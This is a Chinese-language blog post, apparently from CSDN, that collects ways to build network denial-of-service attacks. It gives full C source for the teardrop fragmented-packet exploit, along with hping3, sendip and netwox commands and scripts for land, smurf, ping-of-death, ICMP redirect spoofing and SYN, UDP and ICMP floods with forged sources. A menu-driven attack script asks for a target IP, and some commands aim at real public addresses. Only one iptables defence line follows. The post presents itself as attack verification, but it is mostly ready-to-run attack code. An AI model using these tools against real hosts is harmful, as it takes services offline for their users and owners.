【无标题】常见攻击构造方法

最新推荐文章于 2024-05-31 10:37:45 发布
最新推荐文章于 2024-05-31 10:37:45 发布
阅读量748 收藏 2
点赞数 1
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37460687/article/details/126629078
版权

常见攻击

文章目录

一、teardrop

将碎片数据包发送到目标机器。由于接收这些数据包的机器由于TCP / IP碎片重组错误而无法重新组装,因此数据包相互重叠,导致目标网络设备崩溃

代码实现
#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <netdb.h>

#include <netinet/in.h>

#include <netinet/udp.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/socket.h>

#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING

/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */

#define FIX(n) (n)

#else

/* OpenBSD 2.1, all Linux */

#define FIX(n) htons(n)

#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */

#define IPH 0x14 /* IP header size */

#define UDPH 0x8 /* UDP header size */

#define PADDING 0x1c /* datagram frame padding for first packet */

#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */

#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can

* withstand maybe 5 or 10 sometimes... Experiment.*/

void usage(u_char *);

u_long name_resolve(u_char *);

void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)

{

int one = 1, count = 0, i, rip_sock;

// 定义源地址和目的地址

u_long src_ip = 0, dst_ip = 0;

// 定义源端口和目的端口

u_short src_prt = 0, dst_prt = 0;

// 定义一个32位的IPv4地址

struct in_addr addr;

printf("teardrop route|daemon9\n\n");

//创建原始套接字

if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)

{

fprintf(stderr, "raw socket");

exit(1);

}

//设置套接字选项IP_HDRINCL

if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,

(char *)&one, sizeof(one))< 0)

{

fprintf(stderr, "IP_HDRINCL");

exit(1);

}

if (argc < 3)

usage(argv[0]);

// 设置源IP 和 目的IP

if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))

{

fprintf(stderr, "What the hell kind of IP address is that?\n");

exit(1);

}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)

{

switch (i)

{

case 's': // source port (should be emphemeral)

src_prt = (u_short)atoi(optarg);

break;

case 't': // dest port (DNS, anyone?)

dst_prt = (u_short)atoi(optarg);

break;

case 'n': // number to send

count = atoi(optarg);

break;

default :

usage(argv[0]);

break; // NOTREACHED

}

}

srandom((unsigned)(utimes("0",(time_t)0)));

if (!src_prt) src_prt = (random() % 0xffff);

if (!dst_prt) dst_prt = (random() % 0xffff);

if (!count)

count = COUNT;

printf("Death on flaxen wings:\n");

addr.s_addr = src_ip;

printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);

addr.s_addr = dst_ip;

printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);

printf(" Amt: %5d\n", count);

printf("[\n ");

for (i = 0; i < count; i++)

{

send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);

// printf("b00m ");

usleep(500);

}

printf("]\n");

return (0);

}

// 设置 IP 包的内容

void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)

{

u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers

u_char byte; // a byte

// 套接字地址结构

struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;

sin.sin_port = src_prt;

sin.sin_addr.s_addr = dst_ip;

packet = (u_char *)malloc(IPH + UDPH + PADDING);

p_ptr = packet;

flag = packet;

bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

// IP version and header length

byte = 0x45;

memcpy(p_ptr, &byte, sizeof(u_char));

p_ptr += 2; // IP TOS (skipped)

// total length

*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);

p_ptr += 2;

*((u_short *)p_ptr) = htons(242); // IP id

p_ptr += 2;

//IP frag flags and offset

*((u_short *)p_ptr) |= FIX(IP_MF);

p_ptr += 2;

*((u_short *)p_ptr) = 0x40; // IP TTL

byte = IPPROTO_UDP;

memcpy(p_ptr + 1, &byte, sizeof(u_char));

// IP checksum filled in by kernel

p_ptr += 4;

// IP source address

*((u_long *)p_ptr) = src_ip;

p_ptr += 4;

// IP destination address

*((u_long *)p_ptr) = dst_ip;

p_ptr += 4;

*((u_short *)p_ptr) = htons(src_prt); // UDP source port

p_ptr += 2;

*((u_short *)p_ptr) = htons(dst_prt); // UDP destination port

p_ptr += 2;

*((u_short *)p_ptr) = htons(PADDING); // UDP total length

p_ptr += 4;

// 发送数据:Fake News

*((u_short *)p_ptr) = 0x46;

p_ptr++;

*((u_short *)p_ptr) = 0x61;

p_ptr++;

*((u_short *)p_ptr) = 0x6B;

p_ptr++;

*((u_short *)p_ptr) = 0x65;

p_ptr++;

*((u_short *)p_ptr) = 0x20;

p_ptr++;

*((u_short *)p_ptr) = 0x4E;

p_ptr++;

*((u_short *)p_ptr) = 0x65;

p_ptr++;

*((u_short *)p_ptr) = 0x77;

p_ptr++;

*((u_short *)p_ptr) = 0x73;

int i=1;

while(i <= 56)

{

printf("%x\t",*flag);

flag++;

if(0 == i%8)

printf("\n");

i++;

}

if (sendto(sock, packet, IPH + UDPH + PADDING, 0,

(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)

{

fprintf(stderr, "\nsendto");

free(packet);

exit(1);

}

// IP total length is 2 bytes into the header

p_ptr = &packet[2];

*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);

// IP offset is 6 bytes into the header

p_ptr += 4;

*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH+MAGIC+1, 0,

(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)

{

fprintf(stderr, "\nsendto");

free(packet);

exit(1);

}

free(packet);

}

// 获取主机信息

u_long name_resolve(u_char *host_name)

{

struct in_addr addr;

struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)

{

if (!(host_ent = gethostbyname(host_name))) return (0);

bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);

}

return (addr.s_addr);

}

void usage(u_char *name)

{

fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);

exit(0);

}

二、tcp flag 异常攻击

同时对flag中的多个标志进行置为操作
使用ipop工具中的tcp,四个选项都勾选,可以构造tcp flag异常报文

三、ping

发送icmp分片包,可以用下面的命令
ing -f -s 65507 114.114.114.114
65507是包的长度

四、icmp重定向和icmp不可达

icmp重定向:
伪装成主机默认网关发送icmp重定向报文到主机,让主机更改路由表信息,从而达到攻击的目的
ubuntu下使用netwox工具,命令如下:
netwox 86 -f “host 192.168.1.17” -g “192.168.1.19” -i 192.168.1.1
-f 被攻击主机
-g 重定向包需要被攻击者修改的新路由
-i 被攻击者原来的路由

icmp不可达攻击
netwox 82 -f “host 192.168.1.17” -i “192.168.1.1”
-f 被攻击者
-i 被攻击者当前的路由

五、带源路由选项的ip报文攻击

通过在ip选项中添加合法的ip地址,蒙混进入网络,进行攻击;

六、tcp-syn分片

如下脚本和命令结合

root@ubuntu:/home/wjq# 
export  a=6798;
while true;do ./syn_frag.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1;let a++;done;^C
root@ubuntu:/home/wjq# cat syn_frag.sh 
#!/bin/sh
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5  
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5  
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5  
sendip -v -p ipv4 -is $1 -id $3 -ifm 0 -p tcp -ts $2 -td $4 -tfs 1 $5

七、带数据的tcp-syn攻击

用如下脚本可以构造出包

root@ubuntu:/home/wjq# ./tcp_sys_data.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1^C
root@ubuntu:/home/wjq# cat tcp_sys_data.sh 
#!/bin/sh
sendip -v -p ipv4 -is $1 -id $3 -p tcp -ts $2 -td $3 -tfs 1 -d 0xcdcdcdcdcd $5

八、死亡之ping

ping -f -s 65507 114.114.114.114

九、攻击验证方法

九.1 land攻击

使用linux下的hping3工具可以达到攻击效果,命令如下:

tcp
hping3 -S  -p 80 14.215.178.78 -a 14.215.178.78 --flood

– -S tcp-syn
– -p 80 目标端口
– 14.215.178.78 攻击的目标ip
– -a 14.215.178.78 伪装成目标ip
– --flood 以泛洪方式发送

tcp-syn-land

root@ubuntu:/home/sfg# cat tcp_syn_land.sh 
#!/bin/bash

function tcp_syn_land()
{
	local victim_ip=$1
       	local victim_port=$2
	hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood	
}

tcp_syn_land $*

udp-land

hping3 -2  -p 80 14.215.178.78 -a 14.215.178.78 --flood

– -2 表示udp,默认是tcp

icmp
root@ubuntu:/home/wjq# while true;do sendip -v -p ipv4 -is 14.215.178.78 -id 14.215.178.78 -p icmp -d $b 192.168.68.1;let b+=1;done;
root@ubuntu:/home/wjq# echo $b
56249

九.2 flood攻击

tcp泛洪攻击

hping3 -S --rand-source 14.215.178.78 --flood

icmp泛洪

hping3 -1 --rand-source 14.215.178.78 --flood

udp泛洪

hping3 -2 --rand-source 14.215.178.78 --flood

tcp-syn flood

hping3 -S -p 80 --rand-source 14.215.178.78 --flood

tcp-syn分片

hping3 -c 5 -S -p 80 -x -a 192.167.45.67 14.215.178.78;hping3 -c 1 -S -p 80 -a 192.167.45.67 14.215.178.78

icmp flood

hping3 -1 --rand-source 14.215.178.78 --flood

死亡之ping

root@ubuntu:/home/sfg# cat ping_of_death.sh 
#!/bin/bash

function ping_of_death()
{
	local victim_ip=$1
	local id=186
	local data_size=1450
	let icmp_size=${data_size}+8
	hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag
	for i in $(seq 50)
	do
		let offset=${i}*${icmp_size}
		hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
	done
}

ping_of_death $*

smurf

root@ubuntu:/home/sfg# cat smurf.sh 
#!/bin/bash
function smurf()
{
	local victim_ip=$1
	local broadcast_ip=$2
	hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}
smurf $*

teardrop

root@ubuntu:/home/sfg# cat teardrop.sh 
#!/bin/bash

function icmp_teardrop()
{
	local dst_ip=$1
	local id=186
	hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag
	hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
	hping3 --icmp ${dst_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}

icmp_teardrop $*

tcp-syn分片

root@ubuntu:/home/sfg# cat tcp_syn_frag.sh 
#!/bin/bash

function tcp_syn_frag()
{
	local dst_ip=$1
	hping3 -S ${dst_ip} --morefrag --count 1 -S -U --destport 80 --data 1480 --rand-source
	hping3 -S ${dst_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport 80 --data 140 --rand-source
	hping3 -S ${dst_ip} --fragoff 2960 --count 1 -S -U --destport 80 --data 140 --rand-source
}

tcp_syn_frag $*

攻击脚本

#!/bin/bash



function tcp_syn_frag()
{
	echo "Welcome  tcp_syn_frag"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	#local dest_ip=$1
	hping3 -S ${dest_ip} --morefrag --count 1 -S -U --destport ${dest_port} --data 1480 --rand-source
	hping3 -S ${dest_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
	hping3 -S ${dest_ip} --fragoff 2960 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
}

function icmp_teardrop()
{
	echo "Welcome  icmp_teardrop"
	echo "enter tattck target ip:"
	read dest_ip
	local id=186
	hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag
	hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
	hping3 --icmp ${dest_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}


function icmp_smurf()
{
	echo "Welcome  icmp_smurf"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target broadcast ip"
	read broadcast_ip
	hping3 --icmp ${broadcast_ip} -a ${dest_ip} --flood
}


function ping_of_death()
{
	echo "Welcome  ping_of_death"
	echo "enter aattack target ip:"
	read dest_ip
	local id=186
	local data_size=1450
	let icmp_size=${data_size}+8
	hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag
	for i in $(seq 50)
	do
		let offset=${i}*${icmp_size}
		hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
	done
}

function tcp_syn_flood()
{
	echo "Welcome  tcp_syn_flood"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -S -p ${dest_port} --rand-source ${dest_ip} --flood
}


function udp_flood()
{
	echo "Welcome  udp_flood"
	echo "enter attack tartget ip:"
	read dest_ip
	hping3 -2 --rand-source ${dest_ip} --flood
}


function icmp_flood()
{
	echo "Welcome  icmp_flood"
	echo "enter attack target ip:"
	read dest_ip
	hping3 -1 --rand-source ${dest_ip} --flood
}

function tcp_flood()
{
	echo "Welcome  tcp_flood"
	echo "enter attack target ip:"
	read dest_ip
	hping3 -S --rand-source ${dest_ip} --flood
}

function tcp_syn_land()
{
	echo "Welcome  tcp_syn_land"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -S  -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}


function udp_land()
{	
	echo "Welcome  udp_land"
	echo "enter attack target ip:"
	read dest_ip
	echo "enter attack target port:"
	read dest_port
	hping3 -2  -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}
usage()
{
	echo $1
	echo "Usage:"
	echo "	./test_script.sh [one of Support attack lists]"
	echo "Support attack lists:"
	echo "	1 tcp_syn_frag"
	echo "	2 icmp_teardrop"
	echo "	3 icmp smurf"
	echo "	4 ping_of_death"
	echo "	5 tcp_syn_flood"
	echo "	6 udp_flood"
	echo "	7 icmp_flood"
	echo "	8 tcp_flood"
	echo "	9 tcp_syn_land"
	echo "	10 udp_land"
	echo "selcet:"
	read secect
	handle ${secect}
}


function handle()
{
	case $1 in
	"-h")
		usage $*
		;;
	"1")
		tcp_syn_frag
		;;
	"2")
		icmp_teardrop
		;;
	"3")
		icmp_smurf
		;;
	"4")
		ping_of_death
		;;
	"5")
		tcp_syn_flood
		;;
	"6")
		udp_flood
		;;
	"7")
		icmp_flood
		;;
	"8")
		tcp_flood
		;;
	"9")
		tcp_syn_land
		;;
	"10")
		udp_land
		;;
	*)
		usage
		;;
	esac
}

handle $*

tcp类防御方法

限制目的ip的连接数量最大为5个
iptables -I FORWARD -p tcp --syn --dport 80 -m connlimit --connlimit-above 5 --connlimit-daddr -j DROP
瘦,没那么简单
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web跨站点脚本攻击方式和测试方法.doc
10-11
Web跨站点脚本(XSS)攻击是一种常见且危险的安全漏洞,主要针对Web应用程序。攻击者利用这种漏洞向网页注入恶意脚本,当用户访问受影响的页面时,这些脚本会在用户的浏览器中执行,从而可能导致敏感信息泄露、账户...
Wireshark数据包分析——Teardrop泪滴攻击
PP_zi的博客
08-22 3741
分析Teardrop数据包
什么是Teardrop攻击?我们要如何防御Teardrop攻击
驰网云儿
11-13 5708
Teardrop攻击是一种拒绝服务攻击,是一种基于UDP的病态分片数据包的攻击方法,英文“Tear”是“眼泪”的意思,“drop”是“掉落”的意思,顾名思义,Teardrop攻击是一种令人落泪的攻击手段,可见其破坏威力很强大 主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效 攻击效果 被攻击者会出现蓝屏、重启、卡死等情况 1、Teardrop攻击原理 Teardrop攻击工作原理是攻击者A给受害者B发送一些分片I..
利用 Scanpy 库编写 Land 攻击脚本
最新发布
Flag少侠的博客
05-31 4569
Land 攻击是一种DoS(拒绝服务)攻击,它通过向目标系统发送带有相同源地址和目的地址的数据包来触发系统异常。这种攻击利用了网络协议栈的实现漏洞,特别是在处理TCP连接请求时。目标系统在尝试回复自己时会进入死循环,导致资源耗尽和系统崩溃。
渗透测试-----9-拒绝服务(黑客其它的攻击方式)
weixin_62693307的博客
02-03 1961
Flood攻击原理相悖,它正是利用建立TCP/IP三次握手连接来实现拒绝服务攻击,而且与Syn-Flood不同它并非通过耗尽服务器的TCP连接数来让正常用户的正常请求无法响应,而是直接耗尽服务端的内存、CPU等资源让受害者宕机,属于非对称的资源消耗攻击,这种攻击方式的危害性极大,而且一旦遭受分布式攻击是几乎不能被抵御的。SYN Flood利用TCP协议缺陷,它通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或初一正常的服务请求。
TCP Flag异常攻击原理
路与肥的博客
04-29 3344
TCP Flag异常攻击原理
网络攻击2——针对TCP/IP各个协议层的攻击
m0_49864110的博客
11-12 4819
报文的长度字段为16位,即IP报文的最大长度为65535 B,死亡平Ping利用一些长度超大的ICMP报文对系统进行攻击。把报文的源地址和目标地址都设置成某一个受害者的IP地址(源是127网段地址,目的地址是服务器地址),这将导致受害者向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,伪造一个源地址(可以是真实的源地址,也可以是虚假的源地址)的SYN报文大量发给受害者,受害者收到后回应SYN ACK报文,但是受害者不会再收到ACK报文,这就导致受害主机保持了大量的半连接。
SQL注入攻击零距离
12-16
SQL注入攻击是一种常见网络安全威胁,攻击者通过在输入字段中插入恶意的SQL代码,来操纵数据库查询,获取敏感信息或破坏网站功能。标题和描述提到的"SQL注入攻击零距离"表明我们将深入理解这种攻击方式及其防范...
fuzz:模糊所有类型的大多数普通攻击
04-17
这个标题“fuzz:模糊所有类型的大多数普通攻击”暗示了我们正在讨论一个专门针对各种常见攻击模式进行模糊测试的工具或框架。让我们深入探讨模糊测试的基本原理、应用以及它如何对抗各种类型的普通攻击。 模糊测试...
ASP源码—修补跨站脚本攻击漏洞.zip
11-03
跨站脚本攻击网络安全领域中常见的一种攻击方式,它发生在攻击者通过注入恶意脚本到Web页面中,从而影响其他用户时。XSS攻击可能导致敏感信息泄露、会话劫持、钓鱼攻击等多种危害。以下是一些关于ASP和XSS攻击相关...
攻击和防御Informix
07-05
【标题】"攻击和防御Informix"涉及到的主题是关于数据库安全,特别是针对Informix数据库系统的安全攻防策略。Informix是一款由IBM公司开发的关系型数据库管理系统,广泛应用于各种业务环境中。由于其在数据存储和...
Teardrop攻击——发送虚假IP包信息
TBMmagic的博客
12-03 893
一、原始套接字概述 原始套接字,指在传输层下面使用的套接字。流式套接字和数据报套接字这两种套接字工作在传输层,主要为应用层的应用程序提供服务,并且在接收和发送时只能操作数据部分,而不能对IP首部或TCP和UDP首部进行操作,通常把这两种套接字称为标准套接字。 但是,如果我们开发的是更底层的应用,比如发送一个自定义的IP包、UDP包、TCP包或ICMP包,捕获所有经过本机网卡的数据包,伪装本机的IP,想要操作IP首部或传输层协议首部,等等,这些功能对于这两种套接字就无能为力了。这些功能需要使用另一种套接字
Teardrop攻击初体验
CHL的博客
12-04 1582
目录一、Teardrop攻击1.Teardrop攻击介绍2.检测方法二、Teardrop程序代码编写三、参考资料 一、Teardrop攻击 1.Teardrop攻击介绍 Teardrop攻击是一种畸形报文攻击。是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。 2.检测方法 对接收到的分片数据包进行分析,计算数据包的片偏移量
Spring Securtity (九)会话固定攻击和跨站请求伪造
weixin_43189971的博客
07-20 719
1.会话固定攻击概念 2.跨站请求伪造概念 2.1.csrf令牌 2.2.js在其中做了什么
TCP协议详解之TCP Flag标志位来判断TCP会话的开始和结束
热门推荐
answer3lin的博客
12-06 2万+
首先回顾一下TCP标志位的具体含义。 TCP Flag标志位(控制位) 一个TCP包的详细内容: TCP FLAG 标记占1.5个byte,12bit(4bit+8bit,前半个byte与Header Length公用)。 12bit中前三个bit是保留,默认为全0: 000. .... .... = Reserved: Not set 第4个bit为: ...0 ......
典型的DOS攻击技术
weixin_42374938的博客
08-15 1654
Teardrop攻击又叫泪滴攻击也被称为分片攻击,它是一种典型的利用TCP/IP协议的问题进行拒绝服务攻击的方式,是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包,未来路能在到达目标主机后进行数据重组,IP包的TCP首部中包含有分片识别号、偏移量、数据长度、标志位的信息,说明了该分段是原数据的哪一段,这样,目标主机在收到数据后,就能根据首部中的信息将各分片重新组合还原为数据。假设采取IP欺骗的攻击主机为X,它的攻击目标是主机A,并且主机A信任主机B,那么。...
前端安全—常见攻击方式及防御方法
dzqxwzoe的博客
12-31 1088
储存型(持久型):会把攻击者的数据储存到服务端,攻击行为将伴随攻击数据一直存在,每当用户访问该页面就会触发代码执行。很容易被盗取,如果被盗取,别人就可以冒充你的身份,打开你的保险柜,获取你的信息,动用你的资金,这是很危险的。顾名思义就是通过伪造连接请求,在用户不知情的情况下,让用户以自己的身份来完成非本意操作的攻击方法。标签,当用户浏览该页面时,恶意代码就会被执行,从而达到攻击的目的。,后端未经过滤直接存储到数据库,当正常用户浏览到他的留言后,这段。是无状态的协议,为了维持和跟踪用户的状态,引入了。
泛洪攻击常见工具
探测???
10-06 859
这是kali自带的一个工具, 参数与功能众多, 默认是tcp模式.这是kali自带的测试工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值